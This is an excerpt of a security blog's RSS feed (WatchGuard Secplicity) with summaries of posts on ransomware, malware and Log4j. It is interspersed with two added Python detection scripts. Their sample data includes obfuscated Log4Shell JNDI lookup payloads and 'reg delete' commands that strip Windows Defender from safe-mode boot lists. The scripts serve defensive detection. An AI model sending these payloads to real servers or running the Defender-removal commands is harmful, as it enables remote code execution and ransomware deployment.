  <description>  &lt;p&gt;A few days ago, I was scrolling through Twitter and came across a post by MalwareHunterTeam briefly discussing a new ransomware group, Rhysida. A lack of results from a Google search suggests this is a newer group prepping to start operations. I grabbed a sample and downloaded it, and the executable confirmed that this group is indeed in its early stages, based on the breadth of print debugging and the lack of a victim target in the ransom note. This appeared to be a pre-finished test file. Here's what I found. Original File Name: fury_ctm1042.bin MD5: 0c8e88877383ccd23a755f429006b437 SHA1&lt;/p&gt;


</description>
  <pubDate>Tue, 23 May 2023 00:35:18 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">8cc94479-7134-42a5-b004-1a0b1b498d09</guid>
    </item>
<item>
  <title>Cybersecurity News: A Trio of Vulnerabilities, BreachForums Admin Arrested, Hundreds of Ransomware Victims, and The Rise of AI</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/cybersecurity-news-trio-vulnerabilities-breachforums-admin</link>
  <description>  &lt;p&gt;This post arrives later than usual, but as they say, "Better late than never." Researchers and the media have highlighted various unique, interesting, or destructive vulnerabilities in the last few weeks. We decided to pick three of these vulnerabilities and talk about them. One was patched with Microsoft's Patch Tuesday in March; another affects the privacy of almost everyone, and the CL0P ransomware group leveraged the third vulnerability to infect well over 100 victims. We wanted to highlight another vulnerability – BingBang – that allowed Cloud Security Researcher, Hillai Ben-Sasson, to&lt;/p&gt;


</description>
  <pubDate>Thu, 13 Apr 2023 07:23:24 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">a16c4c59-21c3-4db5-9598-311d200068f3</guid>
    </item>
<item>
  <title>Cybersecurity News: Free Cybersecurity Training, TrickBot Group Exposed, Major GoDaddy Breach, and Russia to Legalize cybercrime?!</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/cybersecurity-news-free-cybersecurity-training-trickbot-group</link>
  <description>  A new week, a new month, and a new Cybersecurity News post! This iteration contains a whopping eight (8) stories covering the last two to four weeks. Since cybersecurity is a diverse field of assorted specializations, we attempt to match that with various stories touching on all aspects of cybersecurity. This time we cover a few breaches, Elon Musk's decision to alter Twitter's multi-factor authentication policy, the TrickBot group being exposed and sanctioned, Russia wanting to legalize cybercrime formally, and more! Since this post is relatively longer than previous iterations, we've

</description>
  <pubDate>Mon, 06 Mar 2023 08:49:45 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">70272c5c-7834-485f-b4d1-8d8a00eeec3f</guid>
    </item>
<item>
  <title>Cybersecurity News: Automated Ransomware Attacks, U.S. No Fly List Leaked, and A.I. Detecting A.I.</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/cybersecurity-news-automated-ransomware-attacks-us-no-fly-list</link>
  <description>  &lt;p&gt;Welcome to another iteration of Cybersecurity News, the fairly new and unorthodox semi-monthly news article that highlights a handful of noteworthy cybersecurity-related stories and provides extra references and resources for further research if you desire. We aim to solidify a more concrete release schedule going forward and will release more information once we have it. This post covers six stories on artificial intelligence, a leak of the TSA's No Fly List, cryptocurrency hacks, and ransomware. First, we begin with an ongoing development in malware campaigns leveraging Microsoft&lt;/p&gt;


</description>
  <pubDate>Fri, 17 Feb 2023 14:08:12 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">884f62ad-7c52-4baf-ad3c-b5a4eb57efbc</guid>
    </item>
<item>
  <title>A Technical Analysis of ISAACWiper</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/technical-analysis-isaacwiper</link>
  <description>  &lt;p&gt;Shortly after Putin launched his "special military operation" in Ukraine on February 24th, 2022, researchers from ESET published information about two novel destructive malware families – HermeticWiper and ISAACWiper. HermeticWiper was part of a three-pronged campaign that included a worm and pseudo-ransomware component known as HermeticWizard and HermeticRansom, respectively. HermeticWiper is the data-wiping component. ISAACWiper, on the other hand, was a relatively simple wiper, and some samples included debug strings exposing its capabilities to researchers. Although these two wipers&lt;/p&gt;


</description>
  <pubDate>Fri, 10 Feb 2023 20:41:22 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">031b7406-eaa2-4004-a080-8daa62a997ee</guid>
    </item>
<item>
  <title>Cybersecurity News: ACLU Unveils Mass Surveillance Program, (More) Malvertising, and Breaches</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/cybersecurity-news-aclu-unveils-mass-surveillance-program-more</link>
  <description>  &lt;p&gt;Sifting through the most recent cybersecurity-related news may seem daunting, and keeping up with the latest developments is arduous. However, the WatchGuard Threat Lab is happy to filter through the latest cybersecurity news and highlight some stories we believe are important, noteworthy, or interesting. The goal is to focus on a few recent cybersecurity-related stories, briefly discuss them, and then provide relevant references to research each topic further. Here are the reports. 1) (More) Malvertising via Google Ads Last week, we briefly discussed a noticeable increase in malvertising via&lt;/p&gt;


</description>
  <pubDate>Mon, 30 Jan 2023 08:21:01 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">d1a18ad7-ed6b-4284-8eac-c07bec3f8cc0</guid>
    </item>
<item>
  <title>Law Enforcement Infiltrate and Seize Hive Ransomware Operation</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/law-enforcement-infiltrate-and-seize-hive-ransomware-operation</link>
  <description>  &lt;p&gt;In a sudden, stunning announcement today, the United States Department of Justice, the FBI, Europol, and law enforcement agencies from 13 countries announced the seizure of the transnational Hive ransomware operation. The seizure was part of a months-long operation that began in late July 2022 when the FBI infiltrated the Hive network. Deputy Attorney General Lisa Monaco said it best: "…we hacked the hackers." Ultimately, this led to the seizure of all Tor websites, communications, and documentation held by the ransomware group. The pictures below show the current state of the Hive ransomware&lt;/p&gt;


</description>
  <pubDate>Thu, 26 Jan 2023 16:37:36 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">552549b6-a50e-4dc8-9f88-871443635626</guid>
    </item>
<item>
  <title>Cybersecurity News: Malvertising, Ransomware, and Alleged IRS Breach</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/cybersecurity-news-malvertising-ransomware-and-alleged-irs-breach</link>
  <description>  &lt;p&gt;Regarding malware, breaches, and the overall threat landscape, 2023 is off to a dynamic start. Malvertising (malicious advertising) continues to be a successful attack vector for hackers, especially from sponsored ads via Google searches. Jon DiMaggio released his long-awaited Ransomware Diary series beginning with the first iteration of the LockBit ransomware group. Also, a new group from Belarus claims to have breached the IRS, just as American citizens are beginning the tax season. Here is a snippet of the top cybersecurity stories from last week. 1. Rhadamanthys leverages malvertising A&lt;/p&gt;


</description>
  <pubDate>Wed, 18 Jan 2023 11:17:35 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">f00d73ae-eb08-4d57-8cd0-b85cd70c182e</guid>
    </item>
<item>
  <title>Endurance Ransomware Claims Breach of US Federal Government</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/endurance-ransomware-claims-breach-us-federal-government</link>
  <description>  &lt;p&gt;The WatchGuard Security Team spends a lot of time chasing ransomware extortion groups throughout the dark web. So, it only fits that one of the newer ransomware extortion groups is named Endurance Ransomware. It appears this "group" is one individual known as IntelBroker, who has allegedly breached several entities of the US government and two other separate businesses in one month of existence. This post will unearth IntelBroker's Endurance Ransomware operation before it is brought to light by more destruction. On November 15th, the WatchGuard Security Team discovered a post by IntelBroker on&lt;/p&gt;


</description>
  <pubDate>Thu, 17 Nov 2022 12:57:55 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">27d4f04f-5bd9-4662-9a38-1be566b8d432</guid>
    </item>
<item>
  <title>Over a Billion Records Leaked in Shanghai National Police Database Hack</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/over-billion-records-leaked-shanghai-national-police-database</link>
  <description>  &lt;p&gt;This past week, a hacker by the name of ChinaDan allegedly breached the Shanghai National Police (SHGA) database and has put the nearly 23 TB of data up for sale for 10 bitcoin (BTC), or a little over $200k USD as of this writing. ChinaDan claims the data contains “information on 1 Billion Chinese national residents and several billion case records” including names, addresses, birthplaces, national ID numbers, mobile numbers, and a myriad of data from police reports and criminal cases. To prove the data haul is legitimate, the hacker provided a sample size of 750k entries from three separate&lt;/p&gt;


</description>
  <pubDate>Fri, 08 Jul 2022 12:54:52 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">e80627c9-0489-438a-8748-aa9f3b135f94</guid>
    </item>
<item>
  <title>LockBit Ransomware Group Introduces Bug Bounties and More</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/lockbit-ransomware-group-introduces-bug-bounties-and-more</link>
  <description>  &lt;p&gt;The LockBit ransomware group has unveiled a new website – LockBit 3.0 – to host their ransom extortions and data leaks. The website includes several new features, including an unprecedented bug bounty program to assist the group in securing their site; acceptance of the privacy cryptocurrency, Zcash; and the addition of receiving payments from users to: “extend the timer for 24 hours”, “destroy all information”, and “download data at any moment”. The website wasn’t the only change from the LockBit group. Based on the new ransom note the malware drops, researchers speculate that the inner&lt;/p&gt;


</description>
  <pubDate>Wed, 29 Jun 2022 14:27:06 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">d18e5888-af13-49dc-96a3-b38293729413</guid>
    </item>
<item>
  <title>New Oski Stealer Variant, "Mars Stealer", Targets Credentials, Crypto, and 2FA</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/new-oski-stealer-variant-mars-stealer-targets-credentials-crypto</link>
  <description>  &lt;p&gt;In early 2020, during the emergence of the COVID-19 pandemic, researchers discovered a novel malware named Oski Stealer, capable of stealing browser data such as cookies, history, payment information, and autofill information, as well as cryptocurrency wallets, login credentials of applications, and Authy 2FA information. It can also take screenshots of your desktop and perform file transfers to, and from, a C2 server. Oski performed these actions by (allegedly) gaining access to routers with weak admin passwords and modifying DNS settings to hijack Windows Network Connectivity Status&lt;/p&gt;


</description>
  <pubDate>Tue, 08 Feb 2022 12:20:46 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">6b7d69bc-0de3-4c7d-b476-859f79253658</guid>
    </item>
<item>
  <title>Log4j Becomes The Highest Detected Vulnerability Days After Release</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/log4j-becomes-highest-detected-vulnerability-days-after-release</link>
  <description>  &lt;p&gt;Log4Shell attacks have spread throughout the Internet due to the ease with which attackers can perform them. The WatchGuard Threat Lab sees a sample of these attacks from our customers’ perspectives when they opt to provide anonymized threat intelligence data from their Fireboxes. This limited data, along with our analysis, gives us a unique opportunity to review some of the real-world Log4j attacks happening on the Internet. We searched our data from when Log4Shell was first disclosed until now for signs of these attacks. We detected attacks targeting two recent log4j vulnerabilities: CVE-2021-44228&lt;/p&gt;


</description>
  <pubDate>Fri, 21 Jan 2022 10:17:46 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">fb41793a-ec93-4ffc-a569-fa6077930a4c</guid>
    </item>
<item>
  <title>Critical RCE Vulnerability in Log4J2</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/critical-rce-vulnerability-log4j2</link>
  <description>  &lt;p&gt;[Updated 13-12-2021: Additional information for WatchGuard customers] On Thursday, security researchers disclosed a critical, unauthenticated remote code execution (RCE) vulnerability in log4j2, a popular and widely used logging library for Java applications. CVE-2021-44228 scores a full 10.0 on the CVSS vulnerability scoring system due to a combination of how trivial the exploit is and how damaging the impact is. All versions of log4j2 are vulnerable to varying degrees, with some versions (&amp;gt;= 2.10 and &amp;lt;= 2.14.1) having the option to disable the vulnerable functionality and the latest version (2.15&lt;/p&gt;


</description>
  <pubDate>Fri, 10 Dec 2021 15:53:07 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">5f44f0d1-5a2e-43f5-95fc-0363e6f3eaa3</guid>
    </item>
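The two Log4j posts above describe attacks that arrive as JNDI lookup strings inside request data. The following is an added example, not code from either Secplicity post, showing how a defender can pull those strings out of web access logs even when the attacker has URL-encoded them or hidden the literal "jndi" behind nested lookups such as ${${lower:j}ndi:...} or ${::-j}. The log lines in SAMPLE_LOG are constructed for this example (198.51.100.0/24 is a documentation address range), and the lookup forms handled are the common evasions; anything else is left unresolved on purpose.

```python
"""Spot Log4Shell (CVE-2021-44228) lookup strings in web access logs.

Added example; not code from either Secplicity post. The access-log lines in
SAMPLE_LOG are constructed (198.51.100.0/24 is a documentation range) and the
obfuscation forms handled are the ones commonly used to evade naive
'${jndi:' string matching.
"""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: one that contains no further '${'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The payload we are ultimately looking for, after de-obfuscation.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
PAYLOAD = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def _resolve(expr: str) -> str:
    """Evaluate one innermost lookup the way attackers rely on Log4j doing it.

    ${lower:J}     -> j
    ${upper:j}     -> J
    ${::-j}        -> j   (empty lookup name, default value supplied)
    ${env:NOPE:-j} -> j   (missing variable falls back to its default)

    Any other lookup is replaced by a non-lookup placeholder so that the
    normalisation loop always terminates; that is deliberately conservative.
    """
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    if ":" in expr:
        prefix, rest = expr.split(":", 1)
        prefix = prefix.strip().lower()
        if prefix == "lower":
            return rest.lower()
        if prefix == "upper":
            return rest.upper()
    return "{" + expr + "}"


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups inside-out until a ${jndi: appears or nothing changes."""
    for _ in range(max_rounds):
        if JNDI_PATTERN.search(text):
            return text
        resolved = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            return text
        text = resolved
    return text


def scan_log(lines):
    """Return (line_number, de-obfuscated payload) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        # Attackers URL-encode (sometimes twice) so the raw line never shows '${'.
        decoded = unquote(unquote(line))
        normalized = normalize(decoded)
        m = PAYLOAD.search(normalized)
        if m:
            hits.append((n, m.group(0)))
    return hits


# Constructed access-log lines: one benign request, four Log4Shell probes in
# different disguises, and one legitimate-looking lookup that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:03:14:11 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [11/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7/c}"',
    '10.0.0.9 - - [11/Dec/2021:03:14:14 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 200 10 "-" "-"',
    '10.0.0.2 - - [11/Dec/2021:03:15:00 +0000] "GET /docs?x=${env:HOME:-/tmp} HTTP/1.1" 200 99 "-" "-"',
]

if __name__ == "__main__":
    for n, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

Run against SAMPLE_LOG this reports lines 2 to 5 with the de-obfuscated ${jndi:...} payload and stays silent on the ${env:HOME:-/tmp} lookup. The same normalize() step is what makes a single "jndi" signature hold up against the lower/upper/default-value tricks; a plain substring match on the raw line would miss three of the four probes.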
<item>
  <title>The Evolution of Phishing: A WatchGuard Real-World Example</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/evolution-phishing-watchguard-real-world-example</link>
  <description>  &lt;p&gt;Phishing is a type of social engineering attack where threat actors attempt to trick users into providing sensitive information via email. Typically, this involves creating a phishing campaign in which threat actors send the same phishing email to a large batch of recipients in an attempt to trick at least a small subset of these potential victims. This is not to be confused with spear phishing, a more targeted phishing attack via email that uses specific knowledge or details about the recipient(s) to further deceive them into providing sensitive information. Phishing is an ongoing problem&lt;/p&gt;


</description>
  <pubDate>Wed, 10 Nov 2021 10:47:31 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">a239c2bd-796c-4372-aea2-cca430bc8774</guid>
    </item>
<item>
  <title>Breaking Alert: MSP Targeted Ransomware Attack (Kaseya Supply Chain Attack)</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/breaking-alert-msp-targeted-ransomware-attack-kaseya-supply-chain</link>
  <description>  &lt;p&gt;Managed Service Providers (MSPs), especially ones using Kaseya VSA, should read this and take action as soon as possible. High-level Summary: On Friday, July 2, some MSPs using the on-premises version of Kaseya VSA suffered ransomware attacks that trickled down to their customers. Kaseya says around 1500 companies (so far), many of them customers of MSPs, have been affected, and the attackers (the REvil gang) are asking $70 million in ransom. The attack exploited unpatched vulnerabilities in the Kaseya product that Kaseya is working on fixing ASAP. Anyone using an on-premises Kaseya VSA server (does not&lt;/p&gt;


</description>
  <pubDate>Fri, 02 Jul 2021 15:07:33 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">1a43b4e8-f897-4b5d-be3b-a2e5fc86c7bc</guid>
    </item>
<item>
  <title>Deobfuscating a Dropper for a ZLoader Trojan Variant</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/deobfuscating-dropper-zloader-trojan-variant</link>
  <description>  &lt;p&gt;On March 18th, 2021, the DNSWatch Tailored Analysis Team received an email from an internal WatchGuard employee who deemed the email suspicious. The initial email included an attachment with the title Attachment_57904. A DNSWatch Analyst performed an initial assessment of the file in search of any malicious indicators or behaviors, only to discover that the file was a heavily obfuscated Visual Basic Script (.vbs). Upon this discovery, the file was securely passed on to the Panda Attestation Team for further analysis. This report documents the analysis process of this file and how, ultimately&lt;/p&gt;


</description>
  <pubDate>Thu, 01 Apr 2021 10:00:38 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">e6f13ec9-7217-4fe4-9bb1-2130faad64f3</guid>
    </item>
<item>
  <title>Analysis of a Dridex Banking Trojan Phish</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/analysis-dridex-banking-trojan-phish</link>
  <description>  &lt;p&gt;At the beginning of March, as many Americans were eagerly awaiting another round of stimulus payments, news began to circulate about cybercriminals taking advantage of the American Rescue Plan offering financial assistance (payments and other aid) as part of COVID-19 relief. We got hold of some of these phishing emails and, upon scrutiny, found that the email imitates the IRS, using the official agency logo. However, closer inspection proves the sender spoofed the domain to look like it came from the IRS. We were able to associate these phishes with the banking trojan Dridex, which according&lt;/p&gt;


</description>
  <pubDate>Wed, 31 Mar 2021 08:59:56 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">3b59f8ba-5c8b-40d3-b11a-b9b65f4087a9</guid>
    </item>
<item>
  <title>Analyzing a Fileless Malware Loader</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/analyzing-fileless-malware-loader</link>
  <description>  &lt;p&gt;Thanks to WatchGuard’s Panda Adaptive Defense 360 zero-trust service, WatchGuard Threat Lab was able to identify and stop a sophisticated fileless malware loader before it executed on the victim’s computer. Upon further detailed analysis by our attestation team, we identified several recent browser vulnerabilities that the malware targeted as part of its exploit chain. Malware Behavior The attack that WatchGuard Threat Lab analyzed lived fully in memory, making use of JavaScript [T1059.007] and PowerShell [T1059.001] to execute malicious actions. Advanced attacks like this one, that don’t&lt;/p&gt;


</description>
  <pubDate>Thu, 15 Oct 2020 16:15:41 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">02a107d5-76ca-44ac-87c7-7e3a39d02af9</guid>
    </item>
<item>
  <title>Identifying an Existing APT Intrusion</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/identifying-existing-apt-intrusion</link>
  <description>  &lt;p&gt;Last month, while onboarding a new customer to Panda EDR with the Orion threat hunting console, WatchGuard Threat Lab discovered an existing advanced persistent threat (APT) on the organization’s network. WatchGuard Threat Lab investigated the incident and was able to identify much of the threat actor’s tools, techniques and procedures, including several indicators of compromise (IOCs). Threat Actor Activity Prior to WatchGuard Threat Lab identifying the breach, the threat actors obtained Valid Accounts [T1078], including at least one Local Account [T1078.003] and Domain Account [T1078.002]&lt;/p&gt;


</description>
  <pubDate>Fri, 02 Oct 2020 08:29:56 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">7d6716fd-b309-44c7-9e78-af5eb38db643</guid>
    </item>
<item>
  <title>Catching a Rookie Mistake in a Facebook Phish</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/catching-rookie-mistake-facebook-phish</link>
  <description>  &lt;p&gt;This short post will show a real-world phish that DNSWatch caught and how analysts were able to garner further information using trivial open-source tools because of a unique mistake by the attacker.&lt;/p&gt;


</description>
  <pubDate>Tue, 18 Aug 2020 16:20:42 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">571d761b-6a98-4b5a-b798-ee6e8c9787f2</guid>
    </item>
<item>
  <title>New Research Reveals Sexist Tendencies in Facial Recognition Tech</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/new-research-reveals-sexist-tendencies-facial-recognition-tech</link>
  <description>  &lt;p&gt;Recently Amazon, Microsoft, and others have taken a step back to review the use of their own face recognition software. Some users of this technology may rely on face recognition alone to identify a person. The idea that face recognition software alone is enough to identify a person leaves no room for errors in the programming, and we all know that programs have errors. Understanding the errors and how they present themselves in the program will help the person reviewing the results. Our research, published below, indicates that some face recognition software will misidentify a woman by as much as 18&lt;/p&gt;


</description>
  <pubDate>Wed, 08 Jul 2020 15:44:52 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">b4869fdc-799c-499a-97a3-d8abb92769f1</guid>
    </item>
<item>
  <title>MedusaLocker Ransomware Will Bypass Most Antivirus Software</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/medusalocker-ransomware-will-bypass-most-antivirus-software</link>
  <description>  &lt;p&gt;Last week we came across ransomware with unique evasion techniques in a new variant, or possibly a copycat, of the MedusaLocker ransomware. MedusaLocker ransomware, first seen in September 2019, came with a batch file to evade detection. Batch files contain script commands running in a Command Prompt on Windows machines and have the .bat extension. In the malicious batch file that came with the ransomware payload, we found a command that edits the Windows registry to remove Windows Defender when the computer is booted into safe mode without networking enabled (Minimal mode). reg delete HKLM&lt;/p&gt;


</description>
  <pubDate>Tue, 19 May 2020 15:31:20 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">5f545b6b-d92d-49d6-bf66-32c03b50f924</guid>
    </item>
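The MedusaLocker post above describes a batch file that deletes a registry entry so that Windows Defender is not loaded when the machine boots into safe mode (Minimal). What follows is an added example, not code from the original post: a detection that inspects process command lines (the kind of telemetry a Sysmon event 1 or EDR process-creation record carries) for reg.exe deleting entries under the SafeBoot\Minimal or SafeBoot\Network keys, which are the lists Windows consults to decide which services and drivers to load in safe mode. The command lines in SAMPLE_EVENTS are constructed; "WinDefend" is the Microsoft Defender Antivirus service name and "ExampleAV" is a hypothetical service name used only to show that the rule is not tied to Defender.

```python
"""Flag command lines that remove services from Windows safe-mode boot lists.

Added example; not code from the original post. The command lines below are
constructed to resemble process-creation telemetry (e.g. Sysmon event 1).
HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal and \\Network are
the standard keys Windows reads when booting into safe mode with or without
networking; deleting a security product's entry there means it will not run
when an attacker reboots the box into safe mode to encrypt files undisturbed.
"""
import re

# reg.exe accepts either hive spelling; tolerate both, optional quoting of the
# key, and the ControlSet00N aliases of CurrentControlSet.
SAFEBOOT_DELETE = re.compile(
    r"""(?ix)
    \breg(?:\.exe)?\s+delete\s+"?        # reg delete, optionally quoted key
    (?:HKLM|HKEY_LOCAL_MACHINE)\\
    SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Control\\SafeBoot\\
    (Minimal|Network)\\                  # group 1: which safe-mode list
    ([^"\s\\]+)                          # group 2: the service or driver entry
    """
)


def check_command_line(cmd: str):
    """Return a finding dict when cmd deletes a SafeBoot entry, else None."""
    m = SAFEBOOT_DELETE.search(cmd)
    if m is None:
        return None
    return {
        "safeboot_list": m.group(1).capitalize(),
        "service": m.group(2),
        # /f suppresses the confirmation prompt; scripted abuse nearly always uses it.
        "forced": bool(re.search(r"\s/f\b", cmd, re.IGNORECASE)),
    }


def scan_events(events):
    """Run check_command_line over a list of command lines; keep the hits."""
    findings = []
    for n, cmd in enumerate(events, 1):
        finding = check_command_line(cmd)
        if finding:
            finding["event"] = n
            findings.append(finding)
    return findings


# Constructed telemetry: two Defender removals, one benign query, one unrelated
# delete, and one removal wrapped in cmd.exe using the ControlSet001 alias.
SAMPLE_EVENTS = [
    r'C:\Windows\System32\reg.exe delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend" /f',
    r'reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinDefend /f',
    r'reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal',
    r'reg delete HKLM\SOFTWARE\Contoso\Installer /f',
    r'C:\Windows\System32\cmd.exe /c "reg delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ExampleAV /f"',
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Against SAMPLE_EVENTS the rule fires on events 1, 2 and 5 and ignores the query and the unrelated delete. Because the match is on the SafeBoot key path rather than on a product name, it also catches the same technique aimed at any other service an attacker wants absent in safe mode.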
<item>
  <title>Chase Bank Scams Target Our Own</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/chase-bank-scams-target-our-own</link>
  <description>  &lt;p&gt;The other day, a WatchGuard employee received a text alert stating that Chase Bank had limited access to their account. They knew right away that the message was bogus and offered it to us to investigate. We found that the link within the message sends the user to a fake Chase login page. Fortunately, the employee knew better and didn't follow the link in the text message, but others might not be as observant. We followed the phish through in our test environment and found the scam could end in a takeover of the victim’s bank account. When we first visited the site in our sandbox, we saw&lt;/p&gt;


</description>
  <pubDate>Fri, 08 May 2020 10:04:11 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">2420e98c-8152-446c-b764-c0936a50cb3f</guid>
    </item>
<item>
  <title>PayPal Phishing</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/paypal-phishing</link>
  <description>  &lt;p&gt;The other day, a PayPal phish made it into the inbox of my personal email. It is not normal for phishing emails to make their way past my cloud email provider’s spam filter, so I decided to spin up a sandbox just in case any malware was involved and dive in. The phishing hook in the message body wasn’t anything special. The phish masqueraded as an email from PayPal notifying me that my account access had been limited for suspicious activity. A few things about the wording of this message were obvious giveaways that the source was not legitimate. First, PayPal has always&lt;/p&gt;


</description>
  <pubDate>Mon, 04 May 2020 16:39:51 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">b8cc9822-bec8-4288-be5c-0a74455773f9</guid>
    </item>
<item>
  <title>Malware Writeup: JS:Trojan:Cryxos.2550</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/malware-writeup-jstrojancryxos2550</link>
  <description>  &lt;p&gt;While reviewing currently surging malware attacks back in January 2020, one in particular stood out: JS:Trojan:Cryxos.2550. Its appearances increased by over 457% from the previous week. This isn’t new malware by any means, as Trojan.Cryxos has been written about many times. However, this variant is rather new, and since it’s surging, it is worth asking whether you are protected. In short, if you’re a WatchGuard user then the answer is yes! Allow me to expand on the details of this threat though. About the Malware For starters, the family Trojan.Cryxos has been around for several&lt;/p&gt;


</description>
  <pubDate>Fri, 28 Feb 2020 14:39:50 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">2998e0e7-2d21-45f4-bc1d-34402cf5d60d</guid>
    </item>
<item>
  <title>My CTF Ventures: picoCTF, Reverse Engineering</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/my-ctf-ventures-picoctf-reverse-engineering</link>
  <description>  &lt;p&gt;Moving forward with the picoCTF challenge platform, after completing the General Skills room I opted for the Reverse Engineering room. This room actually stood out first, even before General Skills. I’ve dabbled in reverse engineering (RE) and it’s a fun but complex and challenging process. Fret not, I committed to it and, well, read further to see what I thought about it! Upon entering the Reverse Engineering room, it’s nearly pitch black and you can’t see much. The entrance is semi-illuminated and there’s a sign nearby that reads, “this is not for the faint of heart.” You’re able to walk&lt;/p&gt;


</description>
  <pubDate>Mon, 10 Feb 2020 11:06:42 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">65428de9-6151-45a1-9b3a-79a7b00ee0f4</guid>
    </item>
<item>
  <title>HSTS - A Trivial Response to sslstrip</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/hsts-trivial-response-sslstrip</link>
